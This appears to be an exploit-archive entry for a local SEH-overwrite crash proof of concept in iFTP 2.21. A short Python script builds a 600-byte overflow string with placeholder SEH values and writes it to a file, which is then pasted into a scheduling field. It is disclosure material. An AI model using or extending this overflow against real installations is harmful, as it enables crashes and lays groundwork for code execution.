iFTP 2.21 SEH overwritten Crash PoC

2015.04.28

Credit: Avinash Kumar Thapa "-Acid"

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing : 28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field
buffer = "A"*600
buffer += "BBBB" # Pointer to Next SEH Record
buffer += "CCCC" # SEH HANDLER
file = "test.txt"
f = open(file, "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

iFTP 2.21 SEH overwritten Crash PoC

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.